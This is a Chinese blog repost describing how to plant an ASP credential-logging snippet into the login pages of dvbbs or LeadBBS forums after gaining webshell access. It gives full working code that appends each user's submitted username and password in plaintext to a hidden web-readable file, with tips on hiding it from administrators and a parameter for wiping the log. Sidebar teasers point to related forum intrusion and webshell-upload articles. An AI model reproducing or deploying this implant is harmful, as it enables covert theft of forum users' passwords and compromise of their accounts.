用asp记录论坛用户密码(dvbbs,leadbbs等)

最新推荐文章于 2024-09-17 13:42:29 发布
最新推荐文章于 2024-09-17 13:42:29 发布
阅读量156 收藏
点赞数
文章标签: 数据库
原文链接:https://yq.aliyun.com/articles/452635
版权
很多人在得到动网的数据库后郁闷不已
(呀的,管理员的变态密码让我们的机器跑砸了都没辙)
Now We Have Another Method!!!!!
这就是用asp记录明文密码。


用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。
2.将PATH换成web下可访问的路径,如:C:\Inetpub\wwwroot\...\Info.txt(info.txt的路径越深越好,防止admin发现)
3.你的webshell必须有权限修改文件且FileSystemObject可用。
4.一段时间后在IE上访问: [url]http://.../Info.txt[/url] 就 可以看到登录过的用户的帐号密码。
5.在IE上输 [url]http://.../[/url] (which your modified).asp?u=del可一清楚info.txt的内容。

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。
2.为了防止info.txt过大,我用清空info.txt的方法。
当然你可以新建文件来解决此问题。
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if
--------------------------------------------------------------------
<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("Scripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile(PATH,2,True)
file.WriteLine ""
End If
If fso.FileExists("PATH") Then
set file=fso.OpenTextFile(PATH,8,True)
Else
set file=fso.CreateTextFile(PATH)
end if
file.WriteLine "Username:"+Request.form("Username")
file.WriteLine "Password:"+Request.form("password")
file.close
set file3=fso.GetFile(PATH)
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if

set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing

%>














本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8520 ,如需转载请自行联系原作者





weixin_33772645
关注
Google / Baidu 黑客搜索引擎语法详细记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-08 2302
下面就来介绍一些常用的语法: intext: 这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含”动网”的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含”安全天使”的网页.同理allintitle:也同intitle类似. cache: 搜索
asp密码查看器
01-02
ASP密码查看器,用于查看宽带密码,宽带刷钻必备!!ASP 密码查看器 宽带 密码查看
入侵dvbbs论坛后获取全部人密码另一法!
数码先锋的专栏
02-06 668
文章来源:火狐论坛记得网络上有篇文章是说利用修改登陆页面可以获取所有登陆者的密码!因为asp空间难找,而且,修改起来不是很适合菜鸟,我这提供另外一种方式!前提,你必须有个php空间。http://www.512j.com在这里可以免费得到10MB的假设我们的空间是http://test.512j.com在目录下建立一个文件a.php代码以下内容为程序代码://a.php $s="c
LeadBBS v2.77a 正式版.rar
08-30
│ inc/Board_Popfun.asp (DvBBS专用请替换专用文件) │ │ User/inc/Mail_fun.asp │ │ User/UserTurnOn.asp │ │ User/LookUserInfo.asp │ │ manage/inc/bbsmanage_fun.asp │ │ announce/announce2.asp │ ...
DvBBS 6.0(6.1) to LeadBBS 2.88 转换程序
12-27
版面,用户短消息,用户数据,论坛帖子) 待最后出现LeadBBS转移程序更新结束的提示并无新数据内容显示后,说明转换完成. 如果转换过程出现意外错误,说明转换失败,需要从头再来, 用原来备份的LeadBBS...
全文检索者论坛搜索 v1.0 正式版
03-30
【全文检索者论坛搜索 v1.0 正式版】是一款专为leadbbs3.14和dvbbs7 SP2 Access数据库设计的站内搜索引擎。这款软件是基于ASP.NET技术开发的,旨在提高论坛内容的搜索效率,提供用户更便捷的信息查找体验。 ASP.NET...
基于asp.net网上论坛BBS毕业设计
(完整资料)
04-15 1740
获取项目源文件,联系Q:1415736481,可指导毕设,课设 摘要 随着Internet技术的飞速发展,论坛已经成为当今网络上不可或缺的一种交流方式之一。教育论坛通常如同一些教学类的博客。或者是教学网站,中心放在对一种知识的传授和学习和相互交流,在计算机软件等技术类的行业,这样的论坛发挥着重要的作用,通过在论坛里浏览帖子,发布帖子能迅速的与很多人在网上进行技术性的沟通和学习。譬如CSDN论坛...
利用动网论坛dvBBS漏洞上传webshell
Jim的博客
08-20 4312
动网论坛一直是国内比较受欢迎的ASP论坛程序 下载数据库查看DV_upfile数据表,搜索F_ID字段得到php文件地址(前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb) 1.      通过注入点获得网站的后台账号和密码,但没有找到后台登录地址 2.      下载动网论坛数据库,一般默认地址是/data/dvbbs8.mdb 3.      读取
关于BBSxp/LeadBBS后台上传Webshell的鸡肋防范
weixin_34413103的博客
11-15 166
近弄了两个BBS系统,发现后台传/改Webshell的时候都做了一定限度的防范,使得很多新手不知道如何去传Webshell控制主机.其实这个问题很简单......几分钟就能解决1.BBSXP昨天朋友弄进去一个BBSXP的论坛,这个论坛以前问题多多,制作人(好象是yuzi工作室)很不注意安全的防范,而且对脚本安全基本知识缺乏了解,导致了很多漏洞,而现在已经...
4.网络编程
weixin_45476535的博客
09-14 516
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1159
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
weixin_43860634的博客
09-14 748
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
Java 学习路线:语言、框架、中间件与数据库
qq_64272546的博客
09-13 1570
Spring Boot 是 Spring 框架的子项目,可简化 Spring 应用的开发与配置。通过提供一系列默认配置和自动化配置功能,Spring Boot 极大地减轻了开发者的工作量。Spring Cloud 是一系列框架的集合,用于开发分布式系统和微服务架构。它涵盖了负载均衡、服务发现、配置管理、分布式追踪等功能。MyBatis-Plus 是 MyBatis 的增强工具,它在 MyBatis 的基础上提供了大量的易用功能,如单表 CRUD 操作、分页、代码生成器等,旨在简化数据库操作。
基于python+django+vue的旅游网站系统
最新发布
计算机学姐的博客
09-17 1722
【2025最新】基于协同过滤+python+django+vue+MySQL的旅游网站系统,前后端分离。
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 1104
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值